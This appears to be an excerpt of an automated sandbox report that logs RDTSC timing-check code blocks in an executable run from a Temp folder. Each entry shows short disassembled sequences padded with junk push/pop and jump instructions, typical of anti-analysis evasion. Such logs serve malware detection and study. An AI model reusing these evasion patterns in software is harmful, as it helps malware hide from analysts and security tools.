Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 849125 second address: 84912B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 84912B second address: 849141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jg 00007FBF8C4F2A46h 0x0000000e ja 00007FBF8C4F2A46h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 849141 second address: 849148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 849148 second address: 849158 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FBF8C4F2A46h 0x0000000a jns 00007FBF8C4F2A46h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 849158 second address: 849184 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FBF8C4F2092h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBF8C4F2092h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8E1478 second address: 8E149D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jng 00007FBF8C4F2A46h 0x00000009 jmp 00007FBF8C4F2A57h 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8E2F14 second address: 8E2F27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF8C4F208Fh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 84772D second address: 847762 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FBF8C4F2A4Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FBF8C4F2A4Ah 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 847762 second address: 847766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 847766 second address: 84776A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8EA655 second address: 8EA65E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8E8FD0 second address: 8E8FEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jng 00007FBF8C4F2A48h 0x0000000b pop edx 0x0000000c jnp 00007FBF8C4F2A62h 0x00000012 push eax 0x00000013 push edx 0x00000014 jp 00007FBF8C4F2A46h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8E8FEC second address: 8E8FF5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8E9456 second address: 8E945D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8E945D second address: 8E946F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FBF8C4F2086h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 891DB6 second address: 891E10 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF8C4F2A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ecx, eax 0x0000000f push 00000004h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FBF8C4F2A48h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b mov edx, dword ptr [ebp+122D2C0Fh] 0x00000031 nop 0x00000032 pushad 0x00000033 jnl 00007FBF8C4F2A48h 0x00000039 push eax 0x0000003a push edx 0x0000003b ja 00007FBF8C4F2A46h 0x00000041 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 891E10 second address: 891E32 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FBF8C4F2094h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 891E32 second address: 891E3C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBF8C4F2A4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8E9943 second address: 8E994D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8E994D second address: 8E9975 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FBF8C4F2A4Ch 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007FBF8C4F2A51h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8EA39D second address: 8EA3A7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF8C4F2086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8EA3A7 second address: 8EA3AE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8ECE7E second address: 8ECE84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8ECE84 second address: 8ECEB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 jmp 00007FBF8C4F2A51h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FBF8C4F2A4Dh 0x00000014 jo 00007FBF8C4F2A46h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8ED007 second address: 8ED00B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8ED00B second address: 8ED00F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8ED44B second address: 8ED468 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2099h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8ED468 second address: 8ED46E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8F0BB7 second address: 8F0BEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBF8C4F2090h 0x0000000b jmp 00007FBF8C4F2098h 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 jc 00007FBF8C4F2086h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8F0BEF second address: 8F0BF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8F0BF3 second address: 8F0C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jg 00007FBF8C4F20A4h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8F103B second address: 8F1052 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007FBF8C4F2A4Ch 0x00000011 jns 00007FBF8C4F2A46h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8F1052 second address: 8F105C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FBF8C4F2086h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8F136E second address: 8F138F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8F138F second address: 8F13A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF8C4F2094h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8F13A8 second address: 8F13AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8F7F0A second address: 8F7F0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8F7F0E second address: 8F7F2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBF8C4F2A4Fh 0x0000000b popad 0x0000000c pushad 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 push edi 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8F81F4 second address: 8F8207 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF8C4F208Dh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8F89D1 second address: 8F89FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jno 00007FBF8C4F2A46h 0x0000000f jmp 00007FBF8C4F2A57h 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8F89FE second address: 8F8A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8F8A02 second address: 8F8A08 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8F9790 second address: 8F97B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF8C4F208Ch 0x00000009 popad 0x0000000a jl 00007FBF8C4F2098h 0x00000010 jmp 00007FBF8C4F208Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8F97B5 second address: 8F97B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8FDD0D second address: 8FDD13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8FDD13 second address: 8FDD1A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8FDD1A second address: 8FDD22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8FCED9 second address: 8FCEDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8FCEDD second address: 8FCEE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FBF8C4F2086h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8FD087 second address: 8FD0DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF8C4F2A50h 0x00000009 jmp 00007FBF8C4F2A56h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FBF8C4F2A50h 0x00000016 jmp 00007FBF8C4F2A56h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8FD36F second address: 8FD39B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF8C4F2093h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c jmp 00007FBF8C4F2092h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8FD39B second address: 8FD3BF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jc 00007FBF8C4F2A46h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007FBF8C4F2A4Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 jnp 00007FBF8C4F2A46h 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8FD3BF second address: 8FD3CB instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBF8C4F2086h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8FD6AF second address: 8FD6B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8FD83B second address: 8FD848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8FD848 second address: 8FD879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007FBF8C4F2A54h 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007FBF8C4F2A52h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8FD879 second address: 8FD885 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FBF8C4F2086h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8FD885 second address: 8FD899 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBF8C4F2A46h 0x00000008 jnp 00007FBF8C4F2A46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8FD899 second address: 8FD8A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FBF8C4F2086h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8FD9F5 second address: 8FD9F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8FD9F9 second address: 8FDA1E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FBF8C4F2094h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jo 00007FBF8C4F2086h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 90A6F8 second address: 90A71E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF8C4F2A50h 0x00000008 jmp 00007FBF8C4F2A51h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 90A71E second address: 90A727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 908D38 second address: 908D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FBF8C4F2A46h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 908D47 second address: 908D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 908EAF second address: 908ED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBF8C4F2A55h 0x0000000a pop edx 0x0000000b je 00007FBF8C4F2A71h 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007FBF8C4F2A46h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 9092CD second address: 9092D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 9092D1 second address: 9092ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBF8C4F2A51h 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 9092ED second address: 9092F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 9092F3 second address: 90930E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007FBF8C4F2A52h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 908464 second address: 908476 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FBF8C4F2088h 0x0000000c push edi 0x0000000d pop edi 0x0000000e pushad 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 912123 second address: 912141 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A58h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 912141 second address: 912147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 912147 second address: 91214B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 911BA3 second address: 911BB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2090h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 911BB8 second address: 911BCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF8C4F2A4Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 911D08 second address: 911D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 911E29 second address: 911E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 911E31 second address: 911E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 911E39 second address: 911E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007FBF8C4F2A46h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 91CAE7 second address: 91CAEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 91CAEB second address: 91CB13 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF8C4F2A46h 0x00000008 jmp 00007FBF8C4F2A59h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 91CB13 second address: 91CB58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF8C4F2095h 0x00000009 popad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007FBF8C4F2097h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FBF8C4F208Ah 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 91CB58 second address: 91CB5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 9220B8 second address: 9220CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FBF8C4F2086h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
